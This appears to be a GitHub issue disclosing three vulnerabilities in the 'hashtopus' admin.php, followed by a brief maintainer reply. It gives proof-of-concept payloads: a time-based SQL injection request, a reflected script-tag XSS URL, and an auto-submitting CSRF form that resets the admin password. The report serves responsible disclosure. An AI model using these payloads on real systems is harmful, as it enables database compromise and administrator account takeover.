We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SQL Injection (authenticated) A SQL Injection is present in admin.php on line 1425:
$format=$_POST["format"]; [...] $vysledek=mysqli_query_wrapper($dblink,"INSERT INTO hashlists (name,format,hashtype) VALUES ('$name',$format,$hashtype)");
Proof of concept:
POST /hashtopus/admin.php?a=newhashlistp HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 30 Cookie: PHPSESSID=<valid_session_id> Connection: close name=ASD&format=0 or SLEEP(10)
Reflective XSS (unauthenticated) An unauthenticated reflective cross-site scripting is present on line 2826 in admin.php:
[…] name=\"return\" value=\"".$_SERVER['QUERY_STRING']." [...]
Proof of concept: /hashtopus/admin.php?"><script>alert(123);</script>
/hashtopus/admin.php?"><script>alert(123);</script>
CSRF (Change admin password to login) Cross-site request forgery protection is not available on sensitive forms.
<script>history.pushState('', '', '/')</script> <form action="http://localhost/hashtopus/admin.php?a=config" method="POST"> <input type="hidden" name="password" value="0wn3d" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script>
The text was updated successfully, but these errors were encountered:
Hi. I didn't really bother with admin.php as long as user is authenticated...
Sorry, something went wrong.
But with the rest you are right :)
No branches or pull requests
SQL Injection (authenticated)
A SQL Injection is present in admin.php on line 1425:
Proof of concept:
Reflective XSS (unauthenticated)
An unauthenticated reflective cross-site scripting is present on line 2826 in admin.php:
Proof of concept:
/hashtopus/admin.php?"><script>alert(123);</script>
CSRF (Change admin password to login)
Cross-site request forgery protection is not available on sensitive forms.
The text was updated successfully, but these errors were encountered: